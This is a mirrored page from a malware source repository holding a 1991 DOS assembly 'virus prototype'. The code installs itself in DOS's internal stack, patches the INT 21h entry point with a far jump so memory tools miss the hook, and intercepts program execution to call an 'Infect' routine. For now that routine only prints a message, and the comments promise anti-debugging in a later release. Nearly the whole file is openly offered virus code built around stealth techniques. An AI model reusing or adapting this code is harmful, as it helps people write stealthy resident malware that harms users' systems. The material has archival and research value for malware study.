mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
198 lines
5.0 KiB
NASM
198 lines
5.0 KiB
NASM
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B> <20>
|
|||
|
;<3B> V I R U S P R O T O T Y P E <20>
|
|||
|
;<3B> <20>
|
|||
|
;<3B> Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd <20>
|
|||
|
;<3B> Date : 25 Jan 1991 21:05 <20>
|
|||
|
;<3B> Function : Found DOS stack in put himself in it. Then trace DOS <20>
|
|||
|
;<3B> function EXEC and type 'Infect File' <20>
|
|||
|
;<3B> <20>
|
|||
|
;<3B> <20>
|
|||
|
;<3B> If you want to have fun with this program just run file STACK.COM <20>
|
|||
|
;<3B> Don't worry, this is not a virus yet, just try to find him in memory <20>
|
|||
|
;<3B> with PCTools and/or MAPMEM. If you can -> just erase the source - it is <20>
|
|||
|
;<3B> useless for you. If you can't -> you don't have to look at it - it is too <20>
|
|||
|
;<3B> difficult to you to understand it. <20>
|
|||
|
;<3B> Best regards, Waleri Todorov <20>
|
|||
|
;<3B> <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov ah,52h ; Get DOS segmenty
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp ax,1234h ; Also check for already here
|
|||
|
jne Install ; If not -> install in memory
|
|||
|
ReturnControl
|
|||
|
|
|||
|
int 20h ; This program will give control
|
|||
|
; to main file
|
|||
|
Install
|
|||
|
mov ax,es ; mov DOS segment in AX
|
|||
|
mov DosSeg,ax ; Save DOS segment for further usage
|
|||
|
mov ds,ax ; DS now point in DOS segment
|
|||
|
|
|||
|
call SearchDos ; Search DOS entry point
|
|||
|
call SearchStack ; Search DOS stack
|
|||
|
|
|||
|
push cs ; DS=ES=CS
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
|
|||
|
mov ax,DosSeg ; get DOS segment in AX
|
|||
|
mov cl,4 ; AX*=16
|
|||
|
shl ax,cl
|
|||
|
mov bx,StackOff ; Stack new begin in BX
|
|||
|
and bx,0FFF0h ; Mask low 4 bit
|
|||
|
add ax,bx ; Compute new real address
|
|||
|
mov cl,4 ; AX/=16
|
|||
|
shr ax,cl ; Now we get SEGMENT:0000
|
|||
|
sub ax,10h ; Segment-=10-> SEG:100h
|
|||
|
mov StackOff,ax ; Save new segment for further usage
|
|||
|
mov es,ax ; ES point in DOS New area
|
|||
|
mov si,100h ; ES:DI -> DOS:free_space_in_stack
|
|||
|
mov di,si ; DS:SI Current segment
|
|||
|
mov cx,512d ; Virus is only 512 bytes long
|
|||
|
rep movsb ; Move virus to new place
|
|||
|
|
|||
|
; Installing virus in DOS' stack we will avoid a conflict with PCTools,
|
|||
|
; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't
|
|||
|
; affected, so if you have program, that count DOS' buffers to found
|
|||
|
; Beast666, she won't found anything.
|
|||
|
; In further release of full virus I will include anti-debugger system,
|
|||
|
; so you will not be able to trace virus
|
|||
|
|
|||
|
mov di,DosOff ; ES:DI point to DOS int21 entry point
|
|||
|
mov ax,DosSeg
|
|||
|
mov es,ax
|
|||
|
mov al,0EAh ; JMP XXXX:YYYY
|
|||
|
stosb
|
|||
|
mov ax,offset Entry21
|
|||
|
stosw ; New 21 handler's offset
|
|||
|
mov ax,StackOff
|
|||
|
stosw ; New 21 handler's segment
|
|||
|
|
|||
|
|
|||
|
; Now DOS will make far jump to virus. In case that virus won't
|
|||
|
; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching,
|
|||
|
; and DOSEDIT will operate correctly (with several virus he don't).
|
|||
|
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
mov Int21off,di ; Virus will call DOS after jump
|
|||
|
jmp ReturnControl ; Return control to file
|
|||
|
|
|||
|
; At this moment, return control is just terminate program via int 20h.
|
|||
|
; In further release of full virus this subroutine will be able to
|
|||
|
; return control to any file (COM or EXE).
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; These are two scanners subroutine. All they do are scanning DOS segment
|
|||
|
; for several well-known bytes. Then they update some iternal variables.
|
|||
|
; Be patience, when debug this area!
|
|||
|
|
|||
|
SearchDos
|
|||
|
mov ax,cs:[DosSeg]
|
|||
|
mov ds,ax
|
|||
|
xor si,si
|
|||
|
|
|||
|
Search1
|
|||
|
lodsw
|
|||
|
cmp ax,3A2Eh
|
|||
|
je NextDos1
|
|||
|
dec si
|
|||
|
jmp short Search1
|
|||
|
NextDos1
|
|||
|
lodsb
|
|||
|
cmp al,26h
|
|||
|
je LastDos
|
|||
|
sub si,2
|
|||
|
jmp short Search1
|
|||
|
LastDos
|
|||
|
inc si
|
|||
|
inc si
|
|||
|
lodsb
|
|||
|
cmp al,77h
|
|||
|
je FoundDos
|
|||
|
sub si,5
|
|||
|
jmp short Search1
|
|||
|
FoundDos
|
|||
|
inc si
|
|||
|
mov cs:[Int21off],si
|
|||
|
sub si,7
|
|||
|
mov cs:[DosOff],si
|
|||
|
ret
|
|||
|
|
|||
|
SearchStack
|
|||
|
xor si,si
|
|||
|
Search2
|
|||
|
lodsw
|
|||
|
cmp ax,0CB8Ch
|
|||
|
je NextStack1
|
|||
|
dec si
|
|||
|
jmp short Search2
|
|||
|
NextStack1
|
|||
|
lodsw
|
|||
|
cmp ax,0D38Eh
|
|||
|
je NextStack2
|
|||
|
sub si,3
|
|||
|
jmp short Search2
|
|||
|
NextStack2
|
|||
|
lodsb
|
|||
|
cmp al,0BCh
|
|||
|
je FoundStack
|
|||
|
sub si,4
|
|||
|
jmp short Search2
|
|||
|
FoundStack
|
|||
|
mov di,si
|
|||
|
lodsw
|
|||
|
sub ax,200h
|
|||
|
stosw
|
|||
|
mov cs:[StackOff],ax
|
|||
|
ret
|
|||
|
|
|||
|
Entry21 ; Here is new int 21 handler
|
|||
|
cmp ah,52h ; If GET_LIST_OF_LISTS
|
|||
|
jne NextCheck
|
|||
|
|
|||
|
mov ax,1234h ; then probably I am here
|
|||
|
mov bx,cs:[DosSeg] ; so return special bytes in AX
|
|||
|
mov es,bx
|
|||
|
mov bx,26h
|
|||
|
iret ; Terminate AH=52h->return to caller
|
|||
|
NextCheck
|
|||
|
cmp ax,4B00h ; If EXEC file
|
|||
|
jne GoDos
|
|||
|
call Infect ; then file will be infected
|
|||
|
GoDos
|
|||
|
jmp dword ptr cs:[Int21off]
|
|||
|
; Otherwise jump to DOS
|
|||
|
Infect
|
|||
|
push ds ; At this moment just write on screen
|
|||
|
push dx
|
|||
|
push ax
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset Txt
|
|||
|
mov ah,9
|
|||
|
CallDos
|
|||
|
pushf ; Call real DOS
|
|||
|
call dword ptr cs:[Int21off]
|
|||
|
|
|||
|
pop ax
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
ret
|
|||
|
|
|||
|
Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus
|
|||
|
DosSeg dw 0 ; DOS segment
|
|||
|
StackOff dw 0 ; Offset of stack/New segment
|
|||
|
DosOff dw 0 ; Offset of DOS 21 BEFIRE jump
|
|||
|
Txt db 'Infect File$' ; Dummy text
|
|||
|
|
|||
|
|